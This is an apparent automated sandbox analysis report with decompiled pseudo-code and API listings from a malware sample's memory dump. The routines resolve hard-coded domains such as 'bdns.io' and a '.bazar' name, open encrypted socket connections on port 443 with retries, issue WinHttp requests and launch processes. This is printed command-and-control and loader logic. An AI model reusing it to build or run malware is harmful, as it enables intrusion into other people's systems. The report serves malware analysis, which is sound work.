      • Part of subcall function 003DEF6B: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003DF040
      • Part of subcall function 003DEF6B: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003DF05D
      • Part of subcall function 003DEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003DF06A
      • Part of subcall function 003DEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF074
      • Part of subcall function 003DEF6B: memcpy.MSVCRT ref: 003DF0AA
      • Part of subcall function 003DEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003DF0B5
      • Part of subcall function 003DEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF0C0
    • htons.WS2_32(00000301), ref: 003DFEB9
    • htons.WS2_32(?), ref: 003DFEC2
    • send.WS2_32(?,?,?,00000000), ref: 003DFED4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 92%
    			E003E0DAA(void* __eax, void* __ebx, intOrPtr __edi, intOrPtr __esi) {
    				void* _t60;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr _t76;
    				void* _t79;
    				intOrPtr _t85;
    				intOrPtr* _t86;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				intOrPtr _t90;
    				intOrPtr _t92;
    				intOrPtr _t94;
    				intOrPtr _t100;
    				void* _t102;
    				intOrPtr _t104;
    				intOrPtr _t106;
    				intOrPtr _t116;
    				intOrPtr* _t117;
    				void* _t118;
    				intOrPtr _t121;
    				intOrPtr _t123;
    				intOrPtr _t125;
    				intOrPtr _t127;
    				intOrPtr _t130;
    				intOrPtr _t139;
    				intOrPtr _t140;
    				intOrPtr _t142;
    				intOrPtr _t143;
    				intOrPtr _t144;
    				void* _t145;
    				intOrPtr _t146;
    				intOrPtr* _t148;
    				void* _t149;
    				intOrPtr _t150;
    				intOrPtr _t151;
    				intOrPtr _t152;
    				intOrPtr _t153;
    				void* _t154;
    				void* _t156;
    				void* _t157;
    
    				L0:
    				while(1) {
    					L0:
    					_t146 = __esi;
    					_t140 = __edi;
    					_t102 = __ebx;
    					L003CA47E();
    					_t157 = _t156 + 4;
    					if(__eax == 0) {
    						goto L6;
    					} else {
    						 *((intOrPtr*)(_t154 - 0x1c)) = L003E1DC0(_t76);
    						goto L7;
    					}
    					L8:
    					_t12 = _t154 - 0x90; // 0x736e6462
    					 *((intOrPtr*)(_t154 - 0x80)) = 0x7261;
    					 *((intOrPtr*)(_t154 - 0x84)) = 0x7a61622e;
    					 *((intOrPtr*)(_t154 - 0x88)) = 0x74737572;
    					 *((intOrPtr*)(_t154 - 0x8c)) = 0x74656661;
    					 *((intOrPtr*)(_t154 - 0x90)) = _t140;
    					_t79 = E003C1170(_t12, 0xfde9, _t154 - 8, 0xffffffff);
    					_t157 = _t157 + 0x10;
    					if(_t79 == 0) {
    						L51:
    						_t61 =  *((intOrPtr*)(_t154 - 0x14));
    						if( *((intOrPtr*)(_t154 - 0x14)) != 0) {
    							E003CBB40(_t61);
    							_t157 = _t157 + 4;
    						}
    						_t62 =  *((intOrPtr*)(_t154 - 0x10));
    						if( *((intOrPtr*)(_t154 - 0x10)) != 0) {
    							E003CBB40(_t62);
    							_t157 = _t157 + 4;
    						}
    						_t63 =  *((intOrPtr*)(_t154 - 8));
    						if( *((intOrPtr*)(_t154 - 8)) != 0) {
    							E003CBB40(_t63);
    							_t157 = _t157 + 4;
    						}
    						_t64 =  *((intOrPtr*)(_t154 - 0xc));
    						if( *((intOrPtr*)(_t154 - 0xc)) != 0) {
    							E003CBB40(_t64);
    							_t157 = _t157 + 4;
    						}
    						_t65 =  *((intOrPtr*)(_t154 - 0x1c));
    						if(_t65 != 0) {
    							_push(_t65);
    							L003C1CB0();
    						}
    						_t66 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0xac))))(0x3e8600);
    						_t130 =  *0x3e8628; // 0x622508
    						 *0x3e8618 =  *0x3e8618 - 1;
    						 *((intOrPtr*)( *((intOrPtr*)(_t130 + 0xc4))))(0x3e8600);
    						return  *((intOrPtr*)(_t154 - 0x18));
    					}
    					L9:
    					_t148 =  *((intOrPtr*)(_t154 - 0x1c));
    					_push(_t154 - 0x2c);
    					_push( *((intOrPtr*)(_t154 - 8)));
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t148))))() != 0 &&  *((intOrPtr*)(_t154 - 0x2c)) == 0xc8) {
    						L13:
    						_t85 =  *((intOrPtr*)( *((intOrPtr*)( *_t148 + 0xc))))(_t154 - 0xc, _t154 - 0x28);
    						__eflags = _t85;
    						if(_t85 == 0) {
    							goto L51;
    						}
    						L14:
    						_t116 =  *((intOrPtr*)(_t154 - 0x28));
    						__eflags = _t116 - 6;
    						if(_t116 <= 6) {
    							goto L51;
    						}
    						L15:
    						_t86 =  *((intOrPtr*)(_t154 - 0xc));
    						_t149 = _t116 + _t86;
    						__eflags = _t86 - _t149;
    						if(_t86 >= _t149) {
    							L19:
    							_t117 = _t86;
    							__eflags = _t86 - _t149;
    							if(_t86 >= _t149) {
    								L25:
    								_t118 = _t117 - _t86;
    								__eflags = _t118 - 6;
    								if(_t118 <= 6) {
    									goto L51;
    								}
    								L26:
    								__eflags = _t118 - 0x10;
    								if(_t118 >= 0x10) {
    									goto L51;
    								}
    								L27:
    								_t87 = E003C1170(_t86, 0, _t154 - 0x14, _t118);
    								_t157 = _t157 + 0x10;
    								__eflags = _t87;
    								if(_t87 == 0) {
    									goto L51;
    								}
    								L28:
    								_t104 =  *((intOrPtr*)(_t154 + 0xc));
    								_t150 = 0;
    								__eflags = 0;
    								while(1) {
    									L29:
    									_t88 = L003C94D0(_t104,  *((intOrPtr*)(_t154 - 0x14)), 0x1bb);
    									__eflags = _t88;
    									if(_t88 != 0) {
    										break;
    									}
    									L30:
    									_t100 =  *0x3e8628; // 0x622508
    									_t150 = _t150 + 1;
    									 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc8))))(0x7530);
    									__eflags = _t150 - 0x14;
    									if(_t150 < 0x14) {
    										continue;
    									}
    									break;
    								}
    								L31:
    								__eflags = _t150 - 0x14;
    								if(_t150 == 0x14) {
    									goto L51;
    								}
    								L32:
    								_t151 = 0;
    								__eflags = 0;
    								 *((intOrPtr*)(_t154 - 4)) = 0;
    								while(1) {
    									L33:
    									_t90 = E003CD890(_t151, __eflags,  *((intOrPtr*)(_t154 + 8)), _t104, _t154 - 4);
    									_t157 = _t157 + 0xc;
    									__eflags = _t90;
    									if(_t90 == 0) {
    										break;
    									}
    									L34:
    									_t125 =  *0x3e8628; // 0x622508
    									_t151 = _t151 + 1;
    									 *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xc8))))(0x7530);
    									__eflags = _t151 - 0x14;
    									if(__eflags < 0) {
    										continue;
    									}
    									L35:
    									L38:
    									__eflags = _t151 - 0x14;
    									if(_t151 == 0x14) {
    										goto L51;
    									}
    									L39:
    									_t143 =  *((intOrPtr*)(_t154 + 8));
    									_t152 = 0;
    									__eflags = 0;
    									 *((intOrPtr*)(_t154 - 4)) = 0;
    									while(1) {
    										L40:
    										_t92 = E003D1B80(_t152, _t143, _t104, _t154 - 4);
    										_t157 = _t157 + 0xc;
    										__eflags = _t92;
    										if(_t92 == 0) {
    											break;
    										}
    										L41:
    										_t123 =  *0x3e8628; // 0x622508
    										_t152 = _t152 + 1;
    										 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0xc8))))(0x7530);
    										__eflags = _t152 - 0x14;
    										if(_t152 < 0x14) {
    											continue;
    										}
    										L42:
    										L45:
    										__eflags = _t152 - 0x14;
    										if(_t152 == 0x14) {
    											goto L51;
    										}
    										L46:
    										_t153 = 0;
    										__eflags = 0;
    										_t145 = _t104 + 8;
    										while(1) {
    											L47:
    											_t94 = E003C1FE0(_t104, _t145, _t153,  *((intOrPtr*)(_t154 + 8)), _t104, _t145);
    											_t157 = _t157 + 0xc;
    											__eflags = _t94;
    											if(_t94 != 0) {
    												break;
    											}
    											L48:
    											_t121 =  *0x3e8628; // 0x622508
    											_t153 = _t153 + 1;
    											 *((intOrPtr*)( *((intOrPtr*)(_t121 + 0xc8))))(0x7530);
    											__eflags = _t153 - 0x64;
    											if(_t153 < 0x64) {
    												continue;
    											}
    											break;
    										}
    										L49:
    										__eflags = _t153 - 0x64;
    										if(_t153 != 0x64) {
    											 *((intOrPtr*)(_t154 - 0x18)) = 1;
    										}
    										goto L51;
    									}
    									L43:
    									_t144 =  *((intOrPtr*)(_t154 - 4));
    									__eflags = _t144;
    									if(_t144 != 0) {
    										E003C1380(_t144);
    										_push(_t144);
    										L003C1CB0();
    										_t157 = _t157 + 4;
    									}
    									goto L45;
    								}
    								L36:
    								_t142 =  *((intOrPtr*)(_t154 - 4));
    								__eflags = _t142;
    								if(_t142 != 0) {
    									E003C2DE0(_t142);
    									_push(_t142);
    									L003C1CB0();
    									_t157 = _t157 + 4;
    								}
    								goto L38;
    							}
    							L20:
    							do {
    								L21:
    								_t139 =  *_t117;
    								__eflags = _t139 - 0x30;
    								if(_t139 < 0x30) {
    									L23:
    									__eflags = _t139 - 0x2e;
    									if(_t139 != 0x2e) {
    										goto L25;
    									}
    									goto L24;
    								}
    								L22:
    								__eflags = _t139 - 0x39;
    								if(_t139 <= 0x39) {
    									goto L24;
    								}
    								goto L23;
    								L24:
    								_t117 = _t117 + 1;
    								__eflags = _t117 - _t149;
    							} while (_t117 < _t149);
    							goto L25;
    						} else {
    							goto L16;
    						}
    						do {
    							L16:
    							_t127 =  *_t86;
    							__eflags = _t127 - 0x30;
    							if(_t127 < 0x30) {
    								goto L18;
    							}
    							L17:
    							__eflags = _t127 - 0x39;
    							if(_t127 <= 0x39) {
    								goto L19;
    							}
    							L18:
    							_t86 = _t86 + 1;
    							__eflags = _t86 - _t149;
    						} while (_t86 < _t149);
    						goto L19;
    					}
    					L11:
    					_t106 =  *0x3e8628; // 0x622508
    					_t102 = _t102 + 1;
    					 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0xc8))))("h N");
    					if(_t102 < 0x1e) {
    						L1:
    						 *((intOrPtr*)(_t154 - 0x8c)) = 0x6f692e;
    						 *((intOrPtr*)(_t154 - 0x90)) = 0x736e6462;
    						_t60 = E003C1170(_t154 - 0x90, 0xfde9, _t154 - 0x10, 0xffffffff);
    						_t157 = _t157 + 0x10;
    						_t161 = _t60;
    						if(_t60 == 0) {
    							goto L51;
    						}
    						L2:
    						_t146 =  *((intOrPtr*)(_t154 - 0x10));
    						_t76 = E003E1280(_t161,  *((intOrPtr*)(_t154 - 0x10)));
    						_t157 = _t157 + 4;
    						_push(0x1c);
    						if(_t76 == 0) {
    							L4:
    							L003CA47E();
    							_t157 = _t157 + 4;
    							__eflags = _t76;
    							if(_t76 == 0) {
    								goto L6;
    							} else {
    								 *((intOrPtr*)(_t154 - 0x1c)) = E003E1D30(_t76);
    								L7:
    								_push(0x1bb);
    								_push(_t146);
    								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 - 0x1c)))) + 8))))() == 0) {
    									goto L11;
    								}
    								goto L8;
    							}
    						} else {
    							continue;
    						}
    					}
    					L12:
    					goto L51;
    					L6:
    					 *((intOrPtr*)(_t154 - 0x1c)) = 0;
    					goto L7;
    				}
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003E0DAA
    • ??3@YAXPAX@Z.MSVCRT ref: 003E1082
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003E0420(CHAR* _a4) {
    				struct _PROCESS_INFORMATION _v20;
    				struct _STARTUPINFOA _v88;
    				int _t18;
    				int _t31;
    
    				memset( &_v88, 0, 0x44);
    				_v20.hProcess = 0;
    				_v20.hThread = 0;
    				_v20.dwProcessId = 0;
    				_v20.dwThreadId = 0;
    				_v88.cb = 0x44;
    				_v88.dwFlags = 1;
    				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0x10, 0, 0,  &_v88,  &_v20);
    				_t31 = _t18;
    				if(_t31 != 0) {
    					WaitForSingleObject(_v20.hProcess, 0x2710);
    					CloseHandle(_v20);
    					CloseHandle(_v20.hThread);
    					return _t31;
    				}
    				return _t18;
    			}

    APIs
    • memset.MSVCRT ref: 003E042F
    • CreateProcessA.KERNEL32(00000000,003E0568,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 003E0468
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 003E047E
    • CloseHandle.KERNEL32(?), ref: 003E048E
    • CloseHandle.KERNEL32(?), ref: 003E0494
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 16%
    			E003D48F6(intOrPtr* __ebx, intOrPtr _a4, void* _a8, int _a12) {
    				void* _v8;
    				void* _v12;
    				signed int _v16;
    				void* __esi;
    				void* _t92;
    				void* _t93;
    				int _t94;
    				void* _t98;
    				signed int _t99;
    				signed int _t100;
    				void* _t108;
    				void* _t110;
    				void _t112;
    				signed int _t113;
    				signed int _t114;
    				void* _t116;
    				void* _t118;
    				signed short _t120;
    				signed int _t121;
    				void* _t122;
    				int _t124;
    				void* _t132;
    				void* _t135;
    				void* _t139;
    				intOrPtr* _t147;
    				intOrPtr _t152;
    				int _t156;
    				signed int _t159;
    				signed int _t162;
    				signed int _t164;
    				signed int _t165;
    				signed int _t166;
    				signed int _t167;
    				signed int _t169;
    				int _t176;
    				void* _t181;
    				intOrPtr _t183;
    				int _t184;
    				void* _t188;
    				void* _t189;
    				void* _t190;
    				void* _t191;
    
    				_t147 = __ebx;
    				_t181 = 0x200;
    				_t92 =  *0x3e8538(0x200);
    				_v12 = _t92;
    				_t93 =  *0x3e8538(0x200);
    				_v16 = _v16 & 0x00000000;
    				_t176 = _a12;
    				_v8 = _t93;
    				_t94 =  *(__ebx + 0x32c);
    				if(_t94 == 0) {
    					L4:
    					if(_v16 == _t176) {
    						L39:
    						 *0x3e8540(_v12);
    						 *0x3e8540(_v8);
    						_t98 = 1;
    						L41:
    						return _t98;
    					}
    					while(1) {
    						_t152 = _a4;
    						if(_t152 != 0) {
    							goto L14;
    						}
    						_t113 =  *(_t147 + 0x330);
    						if(_t113 < 0x384) {
    							L11:
    							_t114 =  *(_t147 + 0x330);
    							if(_t114 < 0x1c2) {
    								L22:
    								if(E003DFB73( *_t147, _v12, _t181) != 0x200) {
    									L40:
    									 *0x3e8540(_v12);
    									 *0x3e8540(_v8);
    									_t98 = 0;
    									goto L41;
    								}
    								_t183 = _a4;
    								if(_t183 != 0) {
    									 *((intOrPtr*)(_t183 + 0x130)) =  *((intOrPtr*)(_t183 + 0x130)) + 1;
    								} else {
    									 *(_t147 + 0x330) =  *(_t147 + 0x330) + 1;
    								}
    								if( *((char*)(_v12 + 2)) != 3) {
    									goto L40;
    								} else {
    									_t56 = _t147 + 0x134; // 0x134
    									_t57 = _t147 + 0x124; // 0x124
    									_push(_v8);
    									_t108 = _v12 + 3;
    									if(_t183 == 0) {
    										_push(0x1fd);
    										_push(_t108);
    										_t69 = _t147 + 0x100; // 0x100
    										_t110 = E003D3BB7();
    										_t189 = _t189 + 0x18;
    										if(_t110 == 0) {
    											goto L40;
    										}
    										L32:
    										_t112 =  *_v8;
    										if(_t112 == 5) {
    											L38:
    											if(_v16 != _t176) {
    												_t181 = 0x200;
    												continue;
    											}
    											goto L39;
    										}
    										if(_t112 != 2) {
    											goto L40;
    										}
    										_t120 =  *(_v8 + 9) & 0x0000ffff;
    										__imp__#9(_t120);
    										_t184 = _t120 & 0x0000ffff;
    										if(_t184 > 0x1f2) {
    											goto L40;
    										}
    										_t121 = _v16;
    										_t156 = _t176 - _t121;
    										_t122 = _t121 + _a8;
    										if(_t184 > _t156) {
    											memcpy(_t122, _v8 + 0xb, _t156);
    											_t159 = _v16;
    											_t124 = _t184 - _t176 + _t159;
    											 *(_t147 + 0x32c) = _t124;
    											_t85 = _t147 + 0x13a; // 0x13a
    											memcpy(_t85, _v8 - _t159 + _t176 + 0xb, _t124);
    											_t189 = _t189 + 0x18;
    											_v16 = _t176;
    										} else {
    											memcpy(_t122, _v8 + 0xb, _t184);
    											_t189 = _t189 + 0xc;
    											_v16 = _v16 + _t184;
    										}
    										goto L38;
    									}
    									_push(0x1fd);
    									_push(_t108);
    									_t60 = _t147 + 0x100; // 0x100
    									_t132 = E003D3BB7();
    									_t190 = _t189 + 0x18;
    									if(_t132 == 0) {
    										goto L40;
    									}
    									_t135 = E003D3BB7(_t183 + 0xf8, _v8, 0x1fd, _v12, _t183 + 0x11c, _t183 + 0x12c);
    									_t191 = _t190 + 0x18;
    									if(_t135 == 0) {
    										goto L40;
    									}
    									_t162 = 0x7f;
    									memcpy(_v8, _v12, _t162 << 2);
    									_t189 = _t191 + 0xc;
    									asm("movsb");
    									_t176 = _a12;
    									goto L32;
    								}
    							}
    							_t166 = 0x32;
    							_t169 = _t114 % _t166;
    							if(_t169 != 0) {
    								goto L22;
    							}
    							_push(1);
    							_push(_t169);
    							L21:
    							_push(_t147);
    							_t116 = E003D43AE();
    							_t189 = _t189 + 0xc;
    							if(_t116 == 0) {
    								goto L40;
    							}
    							goto L22;
    						}
    						_t167 = 0x64;
    						_t175 = _t113 % _t167;
    						if(_t113 % _t167 != 0) {
    							goto L11;
    						}
    						_t118 = E003D43AE(_t147, _t175, _t175);
    						_t189 = _t189 + 0xc;
    						if(_t118 == 0) {
    							goto L40;
    						}
    						goto L11;
    						L14:
    						_t99 =  *(_t152 + 0x130);
    						if(_t99 < 0x384) {
    							L18:
    							_t100 =  *(_t152 + 0x130);
    							if(_t100 < 0x1c2) {
    								goto L22;
    							}
    							_t164 = 0x32;
    							if(_t100 % _t164 != 0) {
    								goto L22;
    							}
    							_push(1);
    							_push(_a4);
    							goto L21;
    						}
    						_t165 = 0x64;
    						_t173 = _t99 % _t165;
    						if(_t99 % _t165 != 0) {
    							L17:
    							_t152 = _a4;
    							goto L18;
    						}
    						_t139 = E003D43AE(_t147, _a4, _t173);
    						_t189 = _t189 + 0xc;
    						if(_t139 == 0) {
    							goto L40;
    						}
    						goto L17;
    					}
    				}
    				if(_t94 <= _t176) {
    					_t17 = _t147 + 0x13a; // 0x13a
    					memcpy(_a8, _t17, _t94);
    					_t189 = _t189 + 0xc;
    					 *(__ebx + 0x32c) =  *(__ebx + 0x32c) & 0x00000000;
    					_v16 =  *(__ebx + 0x32c);
    					goto L4;
    				}
    				_t7 = _t147 + 0x13a; // 0x13a
    				_t188 = _t7;
    				memcpy(_a8, _t188, _t176);
    				 *(__ebx + 0x32c) =  *(__ebx + 0x32c) - _t176;
    				_t13 = _t176 + 0x13a; // 0x13a
    				memcpy(_v12, __ebx + _t13,  *(__ebx + 0x32c));
    				memcpy(_t188, _v12,  *(__ebx + 0x32c));
    				goto L39;
    			}

    APIs
    • memcpy.MSVCRT ref: 003D4939
    • memcpy.MSVCRT ref: 003D4955
    • memcpy.MSVCRT ref: 003D4964
    • memcpy.MSVCRT ref: 003D497C
    • memcpy.MSVCRT ref: 003D4B9A
      • Part of subcall function 003D43AE: memset.MSVCRT ref: 003D43DC
      • Part of subcall function 003D43AE: htons.WS2_32(?), ref: 003D43F8
      • Part of subcall function 003D43AE: memset.MSVCRT ref: 003D44C5
      • Part of subcall function 003D43AE: memset.MSVCRT ref: 003D44E8
      • Part of subcall function 003D43AE: htons.WS2_32(?), ref: 003D4524
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D4B37
    • memcpy.MSVCRT ref: 003D4B5F
    • memcpy.MSVCRT ref: 003D4B75
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 56%
    			E003DFB73(intOrPtr* __esi, void* _a4, int _a8) {
    				void* _v8;
    				void* _v12;
    				void* __ebx;
    				void* _t42;
    				void* _t43;
    				int _t44;
    				int _t48;
    				signed short _t49;
    				void _t50;
    				signed int _t51;
    				void* _t52;
    				int _t54;
    				void* _t72;
    				int _t73;
    				void* _t75;
    				int _t77;
    				int _t79;
    				void* _t80;
    				signed int _t87;
    				int _t91;
    				void* _t97;
    				int _t99;
    				void* _t101;
    				intOrPtr* _t102;
    				void* _t103;
    				void* _t104;
    
    				_t102 = __esi;
    				_t42 =  *0x3e8538(0x10000, _t97, _t72, _t80, _t80);
    				_v8 = _t42;
    				_t43 =  *0x3e8538(0x10000);
    				_t73 = _a8;
    				_v12 = _t43;
    				_t44 =  *(__esi + 0x1006c);
    				_t99 = 0;
    				if(_t44 == 0) {
    					L4:
    					__eflags = _t99 - _t73;
    					if(_t99 != _t73) {
    						while(1) {
    							_t75 = _v8;
    							_t48 = E003DF4EF(_t75,  *_t102, 5);
    							__eflags = _t48;
    							if(_t48 == 0) {
    								break;
    							}
    							_t49 =  *(_t75 + 3) & 0x0000ffff;
    							__imp__#9(_t49);
    							_t87 = _t49 & 0x0000ffff;
    							_t50 =  *_t75;
    							__eflags = _t50 - 0x16;
    							if(_t50 == 0x16) {
    								L8:
    								_t51 = E003DF4EF(_t75,  *_t102, _t87);
    								__eflags = _t51;
    								if(_t51 == 0) {
    									break;
    								} else {
    									_t91 = _t51 & 0x8000000f;
    									__eflags = _t91;
    									if(__eflags < 0) {
    										__eflags = (_t91 - 0x00000001 | 0xfffffff0) + 1;
    									}
    									if(__eflags != 0) {
    										break;
    									} else {
    										 *((intOrPtr*)(_t102 + 0x10078)) =  *((intOrPtr*)(_t102 + 0x10078)) + 1;
    										_t24 = _t102 + 0x5c; // 0x105c
    										asm("adc dword [esi+0x1007c], 0x0");
    										_t25 = _t102 + 0x3c; // 0x103c
    										_t52 = E003DEF6B(_t75, _t51, _v12, _t25, _t24, 0);
    										_t104 = _t103 + 0x18;
    										_t77 = _t52 - 0x15;
    										__eflags = _t77;
    										if(_t77 < 0) {
    											break;
    										} else {
    											_t54 = _a8 - _t99;
    											__eflags = _t77 - _t54;
    											if(_t77 > _t54) {
    												memcpy(_a4 + _t99, _v12, _t54);
    												_t79 = _t77 - _a8 + _t99;
    												__eflags = _t79;
    												_t35 = _t102 + 0x6c; // 0x106c
    												 *(_t102 + 0x1006c) = _t79;
    												memcpy(_t35, _v12 - _t99 + _a8, _t79);
    												_t99 = _a8;
    												_t103 = _t104 + 0x18;
    											} else {
    												memcpy(_a4 + _t99, _v12, _t77);
    												_t103 = _t104 + 0xc;
    												_t99 = _t99 + _t77;
    											}
    											__eflags = _t99 - _a8;
    											if(_t99 != _a8) {
    												continue;
    											} else {
    												_t73 = _a8;
    											}
    										}
    									}
    								}
    							} else {
    								__eflags = _t50 - 0x17;
    								if(_t50 != 0x17) {
    									break;
    								} else {
    									goto L8;
    								}
    							}
    							goto L18;
    						}
    						_t73 = 0;
    					}
    				} else {
    					if(_t44 <= _t73) {
    						_t15 = _t102 + 0x6c; // 0x106c
    						memcpy(_a4, _t15, _t44);
    						_t99 =  *(__esi + 0x1006c);
    						_t103 = _t103 + 0xc;
    						_t18 = __esi + 0x1006c;
    						 *_t18 =  *(__esi + 0x1006c) & 0x00000000;
    						__eflags =  *_t18;
    						goto L4;
    					} else {
    						_t5 = _t102 + 0x6c; // 0x106c
    						_t101 = _t5;
    						memcpy(_a4, _t101, _t73);
    						 *(__esi + 0x1006c) =  *(__esi + 0x1006c) - _t73;
    						_t11 = _t73 + 0x6c; // 0x106c
    						memcpy(_v8, __esi + _t11,  *(__esi + 0x1006c));
    						memcpy(_t101, _v8,  *(__esi + 0x1006c));
    					}
    				}
    				L18:
    				 *0x3e8540(_v12);
    				 *0x3e8540(_v8);
    				return _t73;
    			}

    APIs
    • memcpy.MSVCRT ref: 003DFBB0
    • memcpy.MSVCRT ref: 003DFBC9
    • memcpy.MSVCRT ref: 003DFBD8
    • memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DF4EF: recv.WS2_32(?,00000000,003DF7A5,00000000), ref: 003DF519
    • htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DEF6B: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003DEFA8
      • Part of subcall function 003DEF6B: CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003DEFF7
      • Part of subcall function 003DEF6B: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003DF00A
      • Part of subcall function 003DEF6B: memcpy.MSVCRT ref: 003DF01E
      • Part of subcall function 003DEF6B: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003DF040
      • Part of subcall function 003DEF6B: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003DF05D
      • Part of subcall function 003DEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003DF06A
      • Part of subcall function 003DEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF074
      • Part of subcall function 003DEF6B: memcpy.MSVCRT ref: 003DF0AA
      • Part of subcall function 003DEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003DF0B5
      • Part of subcall function 003DEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003DF0C0
    • memcpy.MSVCRT ref: 003DFCA2
    • memcpy.MSVCRT ref: 003DFCB8
    • memcpy.MSVCRT ref: 003DFCD6
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    APIs
    • WinHttpCloseHandle.WINHTTP(?), ref: 003E1540
    • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,002932E0,0002BF20), ref: 003E1561
    • WinHttpOpenRequest.WINHTTP(00000004,?,00000004,00000000,00000000,00000000,?), ref: 003E1598
    • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 003E15BE
    • WinHttpSendRequest.WINHTTP(?,?,?,?,?,?,00000000), ref: 003E15E1
    • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 003E15F0
